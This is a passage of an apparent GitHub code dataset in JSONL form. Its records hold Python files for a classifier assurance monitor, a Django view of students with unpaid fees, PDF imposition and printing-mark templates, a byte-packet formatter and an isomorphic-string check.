p_values\n am_output = self.a_s * credibility + self.b_s * confidence\n\n #print(\"{}, {}, {}\".format(self.a_s, self.b_s, self.threshold_s))\n\n if am_output >= self.threshold_s: # Can we make a decision?\n decisions[\"snapshot\"] = 1.0\n\n if (self.use_sequence):\n # Combining p values:\n\n combined_am_output = 0 # initial value\n\n self.p_value_window.append(p_values)\n self.conf_window.append(confidence)\n self.cred_window.append(credibility)\n\n # if sliding window is full\n #print (\" {}, {} \".format(len(self.p_value_window),self.window_size))\n if len(self.p_value_window) == self.window_size:\n # Do the p value combination\n adjusted_p = self.config.combining_functions[self.comb_type][self.comb_function](\n np.array(self.p_value_window))\n p_values_sort = np.sort(adjusted_p)\n # Compute credibility and confidence:\n prediction_credibility = p_values_sort[-1]\n prediction_confidence = p_values_sort[-1] - p_values_sort[-2]\n # Compute combined AM output\n combined_am_output = self.a_c * prediction_credibility + \\\n self.b_c * prediction_confidence\n decisions[\"comb\"] = 1 if combined_am_output > self.threshold_c else 0\n # print(self.threshold_c)\n # print(combined_am_output)\n\n # print(decisions)\n\n return [self.p_values, prediction, credibility, confidence, decisions, am_output, softmax, combined_am_output]\n\n def get_p_values(self):\n return self.p_values\n\n def clear_windows(self):\n if (self.window_size):\n self.p_value_window.clear()\n self.conf_window.clear()\n self.cred_window.clear()\n\n def update_snapshot_params(self, **kwargs):\n self.threshold_s = kwargs.get('am_threshold', self.threshold_s)\n print('updated snapshot threshold {}'.format(self.threshold_s))\n\n def update_sequence_params(self, **kwargs):\n user_choice = kwargs.get('user_choice', 'trained_best')\n\n if (user_choice == 'trained_best'):\n return\n\n if (user_choice == 'override_threshold'):\n self.threshold_c = kwargs.get('am_s_threshold', self.threshold_c)\n print('updated sequence threshold {}'.format(self.threshold_c))\n return\n\n if (user_choice == 'override_all'):\n window_size = kwargs.get('window_size', self.window_size)\n comb_type = kwargs.get('comb_type', self.comb_type)\n comb_function = kwargs.get('comb_function', self.comb_function)\n found_trained_parameters = False\n if (self.comb_am_config and self.comb_am_config.coeffs):\n for coeff in self.comb_am_config.coeffs:\n if window_size == coeff[0]:\n if comb_type == coeff[1]:\n if comb_function == coeff[2]:\n self.a_c = coeff[3]\n self.b_c = coeff[4]\n self.threshold_c = coeff[5]\n self.comb_type = comb_type\n self.comb_function = comb_function\n self.window_size = window_size\n found_trained_parameters = True\n break\n self.threshold_c = kwargs.get('am_s_threshold', self.threshold_c)\n\n if found_trained_parameter:\n print('overriding sequence parameters based on user choice')\n else:\n print(\n 'Could not find a,b values for user choice of window size, comb type, comb function. Reverting to best trained.')\n\n print('best trained type: {} function: {} window size: {}'.format(\n self.comb_type, self.comb_function, self.window_size))\n print('user choice type: {} function: {} window size: {}'.format(\n comb_type, comb_function, window_size))\n\n print('using sequence parameters a: {} b: {} threshold: {}'.format(\n self.a_c, self.b_c, self.threshold_c))\n del self.p_value_window\n del self.conf_window\n del self.cred_window\n\n self.p_value_window = collections.deque(maxlen=self.window_size)\n self.conf_window = collections.deque(maxlen=self.window_size)\n self.cred_window = collections.deque(maxlen=self.window_size)\n","repo_name":"AbLECPS/alc","sub_path":"alc_utils/assurance_monitor/icad_selective_classification.py","file_name":"icad_selective_classification.py","file_ext":"py","file_size_in_byte":12869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74739575529","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom accounts.models import Student\nfrom accounts.serializers import StudentSerializer\nfrom payment.models import Payment\nfrom paymenttype.models import PaymentType, TuitionFee\nfrom paymentwaving.models import WavedPayment\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef student_unpaid_list(request):\n req = request.GET\n response = []\n pay_status = {\n 'p_first': False,\n 'p_second': False,\n 'p_total': False\n }\n college = ''\n dept = ''\n major = ''\n level = ''\n if request.GET.get('college'):\n college = req['college']\n if request.GET.get('dept'):\n dept = req['dept']\n if request.GET.get('major'):\n major = req['major']\n if request.GET.get('level'):\n level = req['level']\n\n if college == '' and dept == '' and major == '' and level == '':\n students = Student.objects.all().exclude(status='8')\n if college == '' and dept == '' and major == '' and level != '':\n students = Student.objects.filter(level=level)\n if college != '' and dept == '' and major == '' and level == '':\n students = Student.objects.filter(major__dept__college=college)\n if college != '' and dept == '' and major == '' and level != '':\n students = Student.objects.filter(major__dept__college=college, level=level)\n if dept != '' and major == '' and level == '':\n students = Student.objects.filter(major__dept=dept)\n if dept != '' and major == '' and level != '':\n students = Student.objects.filter(major__dept=dept, level=level)\n if major != '' and level == '':\n students = Student.objects.filter(major=major)\n if major != '' and level != '':\n students = Student.objects.filter(major=major, level=level)\n \n for student in students:\n payment_type = PaymentType.objects.get(pk=req['payment_type'])\n payment_wavings = WavedPayment.objects.filter(student=student.id)\n payments = Payment.objects.filter(student=student.id,\n payment_type=req['payment_type'],\n session=req['session'])\n\n try:\n payment_wavings.get(level=req['level'], payment_type=payment_type.id)\n in_wavings = True\n except WavedPayment.DoesNotExist:\n in_wavings = False\n\n if payment_type.tuition:\n tuition = TuitionFee()\n if student.programme_type == \"Full Time\":\n if student.mode_of_entry.name == \"JME\":\n tuition = TuitionFee.objects.get(major=student.major.id, jme=True, ft=True)\n if student.mode_of_entry.name == \"D/E\":\n tuition = TuitionFee.objects.get(major=student.major.id, de=True, ft=True)\n if student.mode_of_entry.name == \"D/E 300\":\n tuition = TuitionFee.objects.get(major=student.major.id, conversion=True, ft=True)\n\n if student.programme_type == \"Part Time\":\n if student.mode_of_entry.name == \"JME\":\n tuition = TuitionFee.objects.get(major=student.major.id, jme=True, pt=True)\n if student.mode_of_entry.name == \"D/E\":\n tuition = TuitionFee.objects.get(major=student.major.id, de=True, pt=True)\n if student.mode_of_entry.name == \"D/E 300\":\n tuition = TuitionFee.objects.get(major=student.major.id, conversion=True, pt=True)\n tuition_payments = payments.filter(payment_type__tuition=True,\n paid=True,\n session=req['session'])\n try:\n level = tuition_payments[0].level.level\n except IndexError:\n level = ''\n t_payments_total = 0\n for pay in tuition_payments:\n t_payments_total += pay.amount\n\n if t_payments_total >= int(tuition.first):\n pay_status['p_first'] = True\n if t_payments_total >= int(tuition.second):\n pay_status['p_second'] = True\n if t_payments_total >= int(tuition.total):\n pay_status['p_total'] = True\n obj = {\n 'student': StudentSerializer(student).data,\n 'pay_status': pay_status,\n 'paid': pay_status['p_total'],\n 'amount': t_payments_total,\n 'owing': tuition.total - t_payments_total,\n 'level': level\n }\n if not pay_status['p_total'] and not in_wavings:\n response.append(obj)\n else:\n try:\n Payment.objects.get(student=student.id, payment_type=req['payment_type'], session=req['session'],\n paid=True)\n except Payment.DoesNotExist:\n if not in_wavings:\n obj = {\n 'student': StudentSerializer(student).data,\n 'owing': payment_type.amount\n }\n response.append(obj)\n \n return Response(response)\n","repo_name":"GHostEater/Portal","sub_path":"payment/views/student_unpaid_list.py","file_name":"student_unpaid_list.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13092077991","text":"from __future__ import annotations\n\n# Python standard\nimport tempfile\nfrom copy import copy\nimport io\nfrom math import floor\n\n# Type hint\nfrom typing import Union, Callable, List, Tuple, Dict, Literal\nfrom types import FunctionType\nfrom io import BytesIO, FileIO\n\n# PDF\nimport PyPDF2 as pypdf\nfrom reportlab.pdfgen.canvas import Canvas\n\n# Project modules\nfrom booklet.core.manuscript import Modifier, Template, Manuscript\nfrom booklet.converters import SigComposition\nimport vailidation\nfrom booklet.utils.misc import *\n\n\n# sample class for example\nclass Sample(Template):\n __name__ = \"Sample\"\n __description__ = \"Sample Template works\"\n\n @property\n def name(self):\n return Sample.__name__\n\n @property\n def description(self):\n return Sample.__description__\n\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n def generate_template(self, *args):\n pass\n\n def do(self, index: int, manuscript: Manuscript, file_mode):\n new_pdf, new_file = self.get_new_pdf(index, manuscript.tem_directory.name, file_mode)\n\n # generation process\n\n new_pdf.write(new_file)\n manuscript.pdf_update(new_pdf, new_file)\n\n\nclass Imposition(Template):\n __name__ = \"Imposition\"\n __description__ = \"Imposition work\"\n\n @property\n def name(self):\n return Imposition.__name__\n\n @property\n def description(self):\n return Imposition.__description__\n\n def __init__(\n self,\n imposition: bool = True,\n gap: int = 0, # pts\n proof: bool = False,\n proof_color: Tuple[float, float, float, float] = (0, 0, 0, 0),\n proof_width: Union[None, int] = None,\n imposition_layout: Union[Tuple[int, int], SigComposition] = (4, 1),\n ):\n\n super().__init__(direction=True)\n\n self.imposition = bool(imposition)\n self.gap = gap if vailidation.check_integer(gap, positive=True) else 0\n self.proof = proof if type(proof) == bool else False\n self.proof_color = self.___get_cmyk(proof_color)\n self.proof_width = self.gap if proof_width == None else proof_width\n self.layout = (\n imposition_layout.layout\n if isinstance(imposition_layout, SigComposition)\n else imposition_layout\n )\n self.pages_per_template = (\n self.layout[0] * self.layout[1] if self.layout != None else 1\n )\n\n def rule(\n self, i: int\n ) -> list: # i = template page, list = manuscript pages unordered\n _i = i * self.pages_per_template\n _f = (i + 1) * self.pages_per_template\n return list(range(_i, _f))\n\n def position(self, i: int) -> tuple[float, float]: # manuscript page\n index = i % self.pages_per_template\n column = self.layout[1]\n row = self.layout[0]\n\n x = (index) % column\n y = row - floor((index) / column) - 1\n x_pos = (self.manuscript_format[0] + self.gap) * x - (\n self.gap if x > column - 1 else 0\n )\n y_pos = (self.manuscript_format[1] + self.gap) * y - (\n self.gap if y > row - 1 else 0\n )\n\n return (x_pos, y_pos)\n\n # Internal routines\n def ___get_cmyk(self, color) -> Tuple[float, float, float, float]:\n if type(color) == str:\n return Conversion.hex_to_cmyk(color)\n if len(color) == 3:\n return Conversion.hex_to_cmyk(Conversion.rgb_to_hex(color))\n elif len(color) == 4:\n return color\n\n def generate_template(self, paper_width, paper_height, template_pages):\n tem_pdf_byte = io.BytesIO()\n template_proof = Canvas(tem_pdf_byte, pagesize=(paper_width, paper_height))\n\n proof_height = 2 * self.manuscript_format[1] / template_pages\n proof_width = self.proof_width\n # position\n x_center = self.manuscript_format[0] + self.gap / 2\n x_position = x_center - proof_width / 2\n y_position = paper_height - proof_height\n proof_position = [x_position, y_position]\n c, m, y, k = self.proof_color\n template_proof.setLineWidth(0)\n template_proof.setFillColorCMYK(c, m, y, k)\n\n heights = []\n\n for i in range(0, template_pages):\n heights.append(proof_position[1])\n if i % 2 == 0:\n template_proof.setLineWidth(0)\n template_proof.setFillColorCMYK(c, m, y, k)\n template_proof.rect(\n proof_position[0],\n proof_position[1],\n proof_width,\n proof_height,\n fill=1,\n )\n proof_position[1] -= proof_height\n template_proof.showPage()\n\n template_proof.save()\n tem_pdf_byte.seek(0)\n proof_templates = pypdf.PdfReader(tem_pdf_byte)\n\n for i in range(0, template_pages):\n proof_page = proof_templates.pages[i]\n proof_page.mediabox.setLowerLeft((proof_position[0], heights[i]))\n proof_page.mediabox.setUpperRight(\n (proof_position[0] + proof_width, heights[i] + proof_height)\n )\n\n return proof_templates, tem_pdf_byte\n\n def do(self, index: int, manuscript: Manuscript, file_mode=\"safe\"):\n\n if not self.imposition:\n return 0\n\n new_pdf, new_file = self.get_new_pdf(index, manuscript.tem_directory.name, file_mode)\n\n self.manuscript_format = manuscript.file_paper_format\n paper_width = (self.manuscript_format[0] + self.gap) * self.layout[1] - (\n self.gap\n )\n paper_height = (self.manuscript_format[1] + self.gap) * self.layout[0] - (\n self.gap\n )\n format = (paper_width, paper_height)\n\n manuscript_pages = len(manuscript.pages)\n pages_per_template = self.pages_per_template\n\n template_pages = int(manuscript_pages / pages_per_template) + (\n 1 if bool(manuscript_pages % pages_per_template) else 0\n )\n\n for i in range(0, template_pages):\n new_pdf.add_blank_page(format[0], format[1])\n\n for i in range(0, template_pages):\n manu_pages = self.index_mapping(manuscript, i, template_pages)\n\n tem_page = new_pdf.pages[i]\n for j in manu_pages:\n page = manuscript.pages[j]\n x, y = self.position_mapping(manuscript, j, manuscript.file_pages)\n\n tx = x\n ty = y\n\n page_translate = pypdf.Transformation().translate(tx=tx, ty=ty)\n page.add_transformation(page_translate)\n page.mediaBox.setLowerLeft((tx, ty))\n upr = (tx + self.manuscript_format[0], ty + self.manuscript_format[1])\n page.mediaBox.setUpperRight(upr)\n\n tem_page.merge_page(page)\n\n if self.proof:\n proof_templates, temp_file = self.generate_template(\n paper_width, paper_height, template_pages\n )\n for i in range(0, template_pages):\n page = new_pdf.pages[i]\n page.merge_page(proof_templates.pages[i])\n\n new_pdf.write(new_file)\n manuscript.meta[\"/Imposition\"] = f\"{self.layout[0]}x{self.layout[1]}\"\n manuscript.pdf_update(new_pdf, new_file)\n\n\nclass PrintingMark(Template):\n __name__ = \"printing mark\"\n __desciprtion__ = \"Add printing marks to manuscript\"\n\n @property\n def name(self):\n return PrintingMark.__name__\n\n @property\n def description(self):\n return PrintingMark.__desciprtion__\n\n def __init__(\n self,\n on: bool = False,\n margin: int = 43, # pts\n crop: bool = True,\n reg: bool = True,\n cmyk: bool = True,\n ):\n\n self.on = on if type(on) == bool else False\n self.margin = margin if margin != None else 43\n self.crop = bool(crop)\n self.reg = bool(reg)\n self.cmyk = bool(cmyk)\n\n super().__init__(direction=True)\n\n def ____basic_position(\n self, pagesize: Tuple[float, float]\n ) -> Tuple[\n Tuple[float, float, float, float], Tuple[Tuple[float, float, float, float]]\n ]:\n x1 = self.margin * 0.25\n x2 = self.margin + pagesize[0] + x1\n y1 = self.margin + pagesize[1]\n y2 = self.margin\n\n x3 = y2\n x4 = x2 - x1\n y3 = x1\n y4 = y1 + y3\n\n return [[x1, x2, x3, x4], [y1, y2, y3, y4]]\n\n def __get_paper_dim(self, pagesize: Tuple[float, float]) -> Tuple[float, float]:\n width, height = pagesize\n x = 2 * self.margin + width\n y = 2 * self.margin + height\n return x, y\n\n def __draw_crop_lines(self, canvas: Canvas, positions: list = []) -> bool:\n if self.crop:\n if len(positions) == 0:\n positions = self.___get_crop_line_positions(self.manu_paper_format)\n canvas.setLineWidth(0.5 * mm)\n canvas.lines(positions)\n return True\n return False\n\n def __draw_registration(\n self, canvas: Canvas, ratio: float = 0.8, positions: list = []\n ) -> bool:\n self.reg_l = 0\n pagesize = self.manu_paper_format\n if self.reg:\n self.reg_l = l = ratio * self.margin\n center = self.margin / 2\n if len(positions) == 0:\n positions = self.___get_registeration_positions(l, center, pagesize)\n for position in positions:\n self.___draw_registration_mark(\n canvas=canvas, x=position[0], y=position[1], l=l\n )\n return True\n return False\n\n def __draw_color_marker(self, canvas: Canvas) -> bool:\n if self.cmyk:\n cyan = [(0.2 * (1 + i), 0, 0, 0) for i in range(0, 5)]\n magenta = [(0, 0.2 * (1 + i), 0, 0) for i in range(0, 5)]\n yellow = [(0, 0, 0.2 * (1 + i), 0) for i in range(0, 5)]\n black = [(0, 0, 0, 0.2 * (1 + i)) for i in range(0, 5)]\n\n color_sequence = [\n (1, 0, 0, 0),\n (1, 1, 0, 0),\n (0, 1, 0, 0),\n (0, 1, 1, 0),\n (0, 0, 1, 0),\n (1, 0, 1, 0),\n (1, 0, 0, 0),\n ]\n\n color_row1 = cyan + magenta\n color_row2 = yellow + black\n pagesize = self.manu_paper_format\n (\n vertical,\n case,\n origin,\n origin_s,\n length,\n ) = self.___get_color_marker_position_and_length(\n pagesize, padding_ratio=0.15\n )\n\n row, column = case.split(\"x\")\n\n row = int(row)\n column = int(column)\n color_map = (\n [color_row1, color_row2] if row == 2 else [color_row1 + color_row2]\n )\n\n if not vertical:\n column, row = row, column\n color_map = List12dim.transpose(color_map)\n\n for i in range(0, row):\n for j in range(0, column):\n square_coordinate = (origin[0] + length * i, origin[1] + length * j)\n color = color_map[i][j]\n c, m, y, k = color\n canvas.saveState()\n canvas.setLineWidth(0)\n canvas.setFillColorCMYK(c, m, y, k)\n canvas.setStrokeColorCMYK(0, 0, 0, 0)\n canvas.rect(\n square_coordinate[0],\n square_coordinate[1],\n length,\n length,\n stroke=1,\n fill=1,\n )\n canvas.restoreState()\n origin_s\n for k in range(0, len(color_sequence)):\n i, j = (0 if vertical else k, k if vertical else 0)\n square_coordinate = (origin_s[0] + i * length, origin_s[1] + j * length)\n color = color_sequence[k]\n c, m, y, k = color\n canvas.saveState()\n canvas.setLineWidth(0)\n canvas.setFillColorCMYK(c, m, y, k)\n canvas.setStrokeColorCMYK(0, 0, 0, 0)\n canvas.rect(\n square_coordinate[0],\n square_coordinate[1],\n length,\n length,\n stroke=1,\n fill=1,\n )\n canvas.restoreState()\n\n return True\n return False\n\n def ___get_crop_line_positions(\n self, pagesize: Tuple[float, float]\n ) -> list[\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n ]:\n trim_l = self.margin * 0.5\n x, y = self.____basic_position(pagesize)\n return [\n (x[0], y[0], x[0] + trim_l, y[0]), # h, u l\n (x[0], y[1], x[0] + trim_l, y[1]), # h, d l\n (x[1], y[0], x[1] + trim_l, y[0]), # h, u r\n (x[1], y[1], x[1] + trim_l, y[1]), # h, d r\n (x[2], y[3], x[2], y[3] + trim_l), # v, u l\n (x[2], y[2], x[2], y[2] + trim_l), # v, d l\n (x[3], y[3], x[3], y[3] + trim_l), # v, u r\n (x[3], y[2], x[3], y[2] + trim_l), # v, d r\n ]\n\n def ___get_registeration_positions(\n self, l: float, center: float, pagesize: Tuple[float, float]\n ) -> list[\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n ]:\n x, y = self.____basic_position(pagesize)\n trim_l = self.margin / 2\n return [\n (center - l / 2, y[0] - center - l),\n (center - l / 2, y[1] + center),\n (x[1] + trim_l / 2 - l / 2, y[0] - center - l),\n (x[1] + trim_l / 2 - l / 2, y[1] + center),\n (x[2] + center, y[3] + trim_l / 2 - l / 2),\n (x[2] + center, center - l / 2),\n (x[3] - center - l, y[3] + trim_l / 2 - l / 2),\n (x[3] - center - l, center - l / 2),\n ]\n\n def ___get_color_marker_position_and_length(\n self, pagesize: Tuple[float, float], padding_ratio: float\n ) -> Tuple[list, Literal[\"2x10\", \"1x20\"], list, list, float]:\n\n # Calculate side and head size and choose bigger one.\n pa = padding_ratio * self.margin\n hor = pagesize[0] - 2 * self.reg_l - self.margin\n ver = pagesize[1] - 2 * self.reg_l - self.margin\n\n if 2 * pa > hor or 2 * pa > ver:\n pa_t = padding_ratio * min(hor, ver)\n else:\n pa_t = pa\n vertical = True\n\n if ver < hor:\n vertical = False\n space_size = (hor - 2 * pa_t, self.margin - 2 * pa)\n origin = [self.margin * 1.5 + self.reg_l + pa_t, 0]\n\n else:\n space_size = (self.margin - 2 * pa, ver - 2 * pa_t)\n origin = [0, self.margin * 1.5 + self.reg_l + pa_t]\n\n # Fit 2x10, 1x20 to the empty space and calculate square size(min(width, height) respectively)\n # and choose bigger size\n # 2x10 case\n if vertical:\n dim2 = space_size[0] * 0.5\n dim10 = space_size[1] * 0.1\n else:\n dim2 = space_size[1] * 0.5\n dim10 = space_size[0] * 0.1\n dim2_10 = min(dim2, dim10)\n # 1x32 case\n if vertical:\n dim1 = space_size[0]\n dim20 = space_size[1] * 0.05\n else:\n dim1 = space_size[1]\n dim20 = space_size[0] * 0.05\n dim1_20 = min(dim1, dim20)\n\n square_length = max(dim2_10, dim1_20)\n case = \"2x10\" if dim2_10 > dim1_20 else \"1x20\"\n\n padding = self.margin / 2 - (\n square_length if case == \"2x10\" else square_length / 2\n )\n if ver < hor:\n origin[1] = padding\n else:\n origin[0] = padding\n\n # origin_mixed = (self.margin+hor+2*self.reg_l+pa, self.margin+pa) if vertical else (self.margin +pa, self.margin+ ver + 2*self.margin+ pa)\n origin_mixed = copy(origin)\n if ver < hor:\n origin_mixed[1] = self.margin * 1.5 + pagesize[1] - square_length * 0.5\n else:\n origin_mixed[0] = self.margin * 1.5 + pagesize[0] - square_length * 0.5\n\n return vertical, case, origin, origin_mixed, square_length\n\n def ___draw_registration_mark(\n self, canvas: Canvas, x: float, y: float, l: float\n ) -> NoReturn:\n def get_abpath4(x0, y0, x1, y1):\n return (x + x0, y + y0, x + x1, y + y1)\n\n def get_abpath2(x0, y0):\n return x + x0, y + y0\n\n line_t = l / 15 # /25\n line_l = l * (3 / 16)\n circle_r1 = l * (5 / 16) - line_t\n circle_r2 = circle_r1 - line_t * (1.5)\n\n lines = [\n get_abpath4(0, l / 2, line_l, l / 2),\n get_abpath4(l - line_l, l / 2, l, l / 2),\n get_abpath4(l / 2, 0, l / 2, line_l),\n get_abpath4(l / 2, l - line_l, l / 2, l),\n ]\n canvas.setLineWidth(line_t)\n canvas.setStrokeColor(registration_black)\n canvas.setFillColor(registration_black)\n # Draw cross line\n canvas.lines(lines)\n # Outer circle parts\n arcs_outer = canvas.beginPath()\n c = l / 2 - line_t / 2\n a = c - circle_r1\n b = c + circle_r1\n x1, y1 = get_abpath2(\n a, a\n ) # Same relative coordinate values are not same in abs different basis\n x2, y2 = get_abpath2(b, b)\n arcs_outer.arc(x1, y1, x2, y2, startAng=180, extent=90)\n arcs_outer.arc(x1 + line_t, y1, x2 + line_t, y2, startAng=270, extent=90)\n arcs_outer.arc(\n x1 + line_t, y1 + line_t, x2 + line_t, y2 + line_t, startAng=0, extent=90\n )\n arcs_outer.arc(x1, y1 + line_t, x2, y2 + line_t, startAng=90, extent=90)\n canvas.drawPath(arcs_outer, fill=0, stroke=1)\n\n # inner circle parts\n arcs_inner = canvas.beginPath()\n a = c - circle_r2\n b = c + circle_r2\n x1, y1 = get_abpath2(a, a)\n x2, y2 = get_abpath2(b, b)\n xc, yc = get_abpath2(l / 2, l / 2)\n d = line_t / 2\n arcs_inner.moveTo(xc - d, yc - d)\n arcs_inner.arcTo(x1, y1, x2, y2, startAng=180, extent=90)\n arcs_inner.moveTo(xc + d, yc - d)\n arcs_inner.arcTo(x1 + line_t, y1, x2 + line_t, y2, startAng=270, extent=90)\n arcs_inner.moveTo(xc + d, yc + d)\n arcs_inner.arcTo(\n x1 + line_t, y1 + line_t, x2 + line_t, y2 + line_t, startAng=0, extent=90\n )\n arcs_inner.moveTo(xc - d, yc + d)\n arcs_inner.arcTo(x1, y1 + line_t, x2, y2 + line_t, startAng=90, extent=90)\n\n canvas.drawPath(arcs_inner, fill=1, stroke=0)\n\n def generate_template(\n self, manuscript: Manuscript\n ) -> Tuple[pypdf.PdfFileReader, BytesIO]:\n self.manu_paper_format = manuscript.file_paper_format\n paper_format = self.__get_paper_dim(self.manu_paper_format)\n\n tem_byte = io.BytesIO()\n printing_template = Canvas(tem_byte, pagesize=paper_format)\n\n if self.crop:\n self.__draw_crop_lines(printing_template)\n if self.reg:\n self.__draw_registration(printing_template)\n if self.cmyk:\n self.__draw_color_marker(printing_template)\n printing_template.showPage()\n printing_template.save()\n\n tem_byte.seek(0)\n template_pdf = pypdf.PdfFileReader(tem_byte)\n\n return template_pdf, tem_byte\n\n def do(\n self, index: int, manuscript: Manuscript, file_mode: str = \"safe\"\n ) -> NoReturn:\n\n if not self.on:\n pass\n else:\n new_pdf, new_file = self.get_new_pdf(index, manuscript.tem_directory.name, file_mode)\n template_pdf, tem_byte = self.generate_template(manuscript)\n template = template_pdf.pages[0]\n for i, page in enumerate(manuscript.pages):\n temp_page = copy(template)\n page.addTransformation(\n pypdf.Transformation().translate(tx=self.margin, ty=self.margin)\n )\n upper = float(page.mediaBox[2])\n right = float(page.mediaBox[3])\n page.mediaBox.setUpperRight((upper + self.margin, right + self.margin))\n\n temp_page.merge_page(page)\n new_pdf.add_page(temp_page)\n\n new_pdf.write(new_file)\n\n manuscript.pdf_update(new_pdf, new_file)\n\n\n# In working\nclass Note(Template):\n __name__ = \"note\"\n __desciprtion__ = \"Expand and add note characters to manuscript\"\n\n @property\n def name(self):\n return Note.__name__\n\n @property\n def description(self):\n return Note.__desciprtion__\n\n def __init__(\n self,\n numbering: bool = True,\n targets: Literal[\"Both\", \"Odd\", \"Even\", \"Odd(only)\", \"Even(only)\"] = \"Both\",\n location: Literal[\"H\", \"F\", \"HF\", \"FH\"] = \"H\",\n align: Literal[\n \"L\", \"R\", \"C\", \"LR\", \"CC\", \"RL\", \"LL\", \"LC\", \"RR\", \"RC\", \"CL\", \"CR\"\n ] = \"LR\",\n margin: float = 8.0,\n font: str = \"Helvetica\",\n fontsize: int = 12.0,\n ):\n\n self.numbering = numbering if type(numbering, bool) else True\n self.targets = targets\n self.location = (\n (location[0], location[1]) if len(align) != 1 else (location, location)\n )\n self.align = (align[0], align[1]) if len(align) != 1 else (align, align)\n\n pass\n\n def rule(\n self, i: int\n ) -> list: # i = template page, list = manuscript pages unordered\n _i = i * self.pages_per_template\n _f = (i + 1) * self.pages_per_template\n return list(range(_i, _f))\n\n def generate_template(\n self, manuscript: Manuscript\n ) -> Tuple[pypdf.PdfFileReader, BytesIO]:\n self.manu_paper_format = manuscript.file_paper_format\n return template_pdf, tem_byte\n\n def do(\n self, index: int, manuscript: Manuscript, file_mode: str = \"safe\"\n ) -> NoReturn:\n if not self.on:\n pass\n else:\n new_pdf, new_file = self.get_new_pdf(index, manuscript.tem_directory.name, file_mode)\n\n # Expand pages\n\n template_pdf, tem_byte = self.generate_template(manuscript)\n for i, page in enumerate(template_pdf):\n pass\n\n new_pdf.write(new_file)\n manuscript.pdf_update(new_pdf, new_file)\n pass\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"HornPenguin/Booklet","sub_path":"booklet/deprecated/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":22780,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"10253078958","text":"from pointInfoReplyContent import PointInfoReplyContent;\nfrom IDataFormatter import IDataFormatter;\nfrom ByteCombinator import ByteCombinator;\nfrom emptycontent import EmptyContent;\n\n\nPOINT_REPLY_EXPECTED_CONTENT_LENGTH = 42;\n\nclass PointReplyContentFormatter(IDataFormatter):\n \"\"\"Class to format content bytes attatched to a packet id equal to point info reply (149)\"\"\"\n\n def format(self, replyBytes):\n Body = EmptyContent();\n #instance to call function that can take two 8 bit bytes and combine them into one 16 bit\n byteCombinator = ByteCombinator();\n\n if(len(replyBytes) > 1):\n if(len(replyBytes) == POINT_REPLY_EXPECTED_CONTENT_LENGTH):\n replyDict = {\n 'replyStatus' : replyBytes[0],\n 'flags' : replyBytes[1],\n 'node' : replyBytes[2],\n 'channel' : replyBytes[3],\n 'channelAddress' : replyBytes[4],\n 'pointCategory' : replyBytes[5],\n 'pointNumber' : replyBytes[6],\n 'logicalPointNumber' : replyBytes[7],\n 'logicalPointZone' : replyBytes[8],\n 'deviceType' : replyBytes[9],\n 'auxiliaryPointAttr' : replyBytes[10],\n 'group' : byteCombinator.combineBytes(replyBytes[11],replyBytes[12]),\n 'areaType' : replyBytes[13],\n 'areaNumber' : replyBytes[14],\n 'sectorID' : replyBytes[15],\n 'loopType' : replyBytes[16],\n 'rawIdentity' : replyBytes[17],\n 'actualDeviceType' : replyBytes[18],\n 'mode&Sensitivity' : replyBytes[19],\n 'rawAnalogueValue1' : replyBytes[20],\n 'rawAnalogueValue2' : replyBytes[21],\n 'rawAnalogueValue3' : replyBytes[22],\n 'LTAFlags' : replyBytes[23],\n 'rawLTA' : replyBytes[24],\n '%Dirtiness' : replyBytes[25],\n 'unitofMeasure1' : replyBytes[26],\n 'unitofMeasure2' : replyBytes[27],\n 'unitofMeasure3' : replyBytes[28],\n 'convertedValue1' : replyBytes[29],\n 'convertedValue2' : replyBytes[30],\n 'convertedValue3' : replyBytes[31],\n 'instantaneousActiveState' : replyBytes[32],\n 'instantaneousFaultState' : replyBytes[33],\n 'confirmedActiveState' : replyBytes[34],\n 'confirmedFaultState' : replyBytes[35],\n 'acknowledgedActiveState' : replyBytes[36],\n 'outputForcedMode' : replyBytes[37],\n 'outputUnforcedState' : replyBytes[38],\n 'outputForcedState' : replyBytes[39],\n 'clientID' : byteCombinator.combineBytes(replyBytes[40] ,replyBytes[41]),\n \n };\n #2 sets of bytes have been combined thus the new expected length is 40\n Body = PointInfoReplyContent(**replyDict);\n else:\n raise TypeError(\"@PointInformationPacket: Invalid packet length\");\n else:\n raise ValueError(\"@PointReplyContentFormatter: Point Info Reply formatter requires more than one byte\");\n if(Body != None):\n return Body;\n\n#For testing purposes replyBytes contains only content of a packet, it does not include SOH, FLG SIZE CHECKSUM OR HEADER\nif(__name__ == '__main__'):\n\n #A length of 42 is used here to emulate a valid packet length as far as we have tested, 10 different test cases all the same content length\n #if the length is less than 42 or greater than but not equal to then for the time being it is raised as invalid content\n\n replyBytes = [0] * POINT_REPLY_EXPECTED_CONTENT_LENGTH;\n for index in range(1, len(replyBytes)):\n replyBytes[index] = index;\n\n body = PointReplyContentFormatter().format(replyBytes);\n\n print(body.getByteArray());","repo_name":"dsikar/bash-scripts","sub_path":"packetizer/PointReplyContentFormatter.py","file_name":"PointReplyContentFormatter.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73953932009","text":"\n\n# O(N) || O(26n) --- O(1)\ndef isIsomorphicString(stringOne, stringTwo):\n return isomorphic(stringOne) == isomorphic(stringTwo)\n\n\ndef isomorphic(string):\n letterDict = dict()\n ans = str()\n nextChar = 'a'\n for char in string:\n if char not in letterDict:\n letterDict[char] = nextChar\n\n nextChar = chr(ord(nextChar) + 1)\n \n ans += 